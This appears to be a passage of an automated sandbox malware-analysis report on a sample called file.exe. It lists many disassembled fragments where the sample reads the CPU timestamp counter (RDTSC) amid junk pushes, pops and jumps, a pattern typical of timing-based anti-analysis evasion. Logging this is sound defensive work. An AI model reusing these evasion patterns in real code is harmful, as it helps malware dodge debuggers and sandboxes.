Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101E73D second address: 101E755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4B90BE622Ch 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101E755 second address: 101E778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4B9132D696h 0x0000000a jmp 00007F4B9132D6A6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101E778 second address: 101E782 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4B90BE6232h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101E782 second address: 101E788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101EA0F second address: 101EA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101EA15 second address: 101EA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4B9132D696h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jnc 00007F4B9132D6A8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101EA3A second address: 101EA4A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F4B90BE6226h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101EBCA second address: 101EBCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101EBCF second address: 101EBD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101EBD5 second address: 101EBDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101EBDB second address: 101EBE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007F4B90BE6226h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1023230 second address: 1023234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10239A8 second address: 10239B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10239B0 second address: 10239B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1023AFD second address: 1023B33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6234h 0x00000007 jnl 00007F4B90BE6226h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007F4B90BE6235h 0x00000018 jmp 00007F4B90BE622Fh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102AB0D second address: 102AB17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102B055 second address: 102B06A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4B90BE6226h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102B06A second address: 102B06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102BF77 second address: 102BF84 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102BF84 second address: 102BFA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D6A8h 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1030D24 second address: 1030D28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1030D28 second address: 1030D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4B9132D6A9h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1035DD4 second address: 1035DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1035DD8 second address: 1035DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1035DDE second address: 1035DE5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1035DE5 second address: 1035DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1035DEE second address: 1035DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1035454 second address: 1035462 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F4B9132D696h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10355D2 second address: 10355E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE622Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10355E0 second address: 10355E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1035752 second address: 1035758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1035758 second address: 103575C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103575C second address: 1035760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10359A1 second address: 10359B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D69Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10359B4 second address: 10359B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10359B8 second address: 10359CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D69Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10359CF second address: 10359D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103BA47 second address: 103BA64 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F4B9132D696h 0x00000009 jmp 00007F4B9132D69Bh 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F4B9132D696h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103BE59 second address: 103BE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103BFE2 second address: 103BFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103C173 second address: 103C177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103B2BE second address: 103B2C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103B2C2 second address: 103B2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10410DF second address: 10410E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10410E6 second address: 10410EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10410EB second address: 10410F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104260A second address: 104261A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4B90BE6228h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104261A second address: 1042626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7D0A2 second address: F7D0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104A9CE second address: 104A9D8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4B9132D696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104A9D8 second address: 104A9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4B90BE622Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104A9EF second address: 104A9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1055578 second address: 1055582 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4B90BE6226h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1055582 second address: 10555AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4B9132D6A3h 0x00000010 jmp 00007F4B9132D69Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10555AA second address: 10555CC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4B90BE6236h 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10555CC second address: 10555D8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4B9132D69Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1054F80 second address: 1054F94 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007F4B90BE6226h 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10574D8 second address: 10574DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105706D second address: 1057071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105F9A3 second address: 105F9A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1068A71 second address: 1068A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1068A75 second address: 1068A87 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4B9132D696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F4B9132D698h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1068A87 second address: 1068A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106B9CC second address: 106B9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106B9D0 second address: 106B9D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107227E second address: 107228A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4B9132D69Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10724F9 second address: 107251C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F4B90BE622Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F4B90BE622Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107251C second address: 1072529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107293D second address: 1072941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1072941 second address: 107294F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107294F second address: 1072953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1072953 second address: 1072957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1072BFF second address: 1072C16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6233h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1072C16 second address: 1072C1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1072C1C second address: 1072C51 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4B90BE6236h 0x0000000f jmp 00007F4B90BE6235h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1084218 second address: 1084225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F4B9132D696h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10840B2 second address: 10840C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F4B90BE6226h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F4B90BE6226h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10840C9 second address: 10840E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4B9132D69Ah 0x0000000c jp 00007F4B9132D696h 0x00000012 jns 00007F4B9132D696h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10840E9 second address: 10840EE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10840EE second address: 10840F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089252 second address: 1089279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6232h 0x00000009 jmp 00007F4B90BE6230h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089279 second address: 1089296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4B9132D6A8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10964EF second address: 1096512 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F4B90BE6236h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1096293 second address: 1096299 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B020A second address: 10B021B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B021B second address: 10B0236 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4B9132D698h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e je 00007F4B9132D696h 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B0236 second address: 10B023A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B023A second address: 10B0251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D69Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AEF41 second address: 10AEF4D instructions: 0x00000000 rdtsc 0x00000002 js 00007F4B90BE6226h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AEF4D second address: 10AEF7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4B9132D6A5h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F4B9132D696h 0x00000016 jmp 00007F4B9132D69Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AF0DA second address: 10AF0DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AF3EF second address: 10AF404 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4B9132D69Ah 0x00000008 pushad 0x00000009 jnc 00007F4B9132D696h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AF404 second address: 10AF43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6236h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F4B90BE6235h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AF5AB second address: 10AF5D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F4B9132D6B2h 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AFBF8 second address: 10AFC17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6237h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AFC17 second address: 10AFC1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AFEF5 second address: 10AFEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AFEFB second address: 10AFF02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AFF02 second address: 10AFF07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B18E7 second address: 10B18EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B18EF second address: 10B18F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B419A second address: 10B41A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B43F3 second address: 10B43F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B43F8 second address: 10B43FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
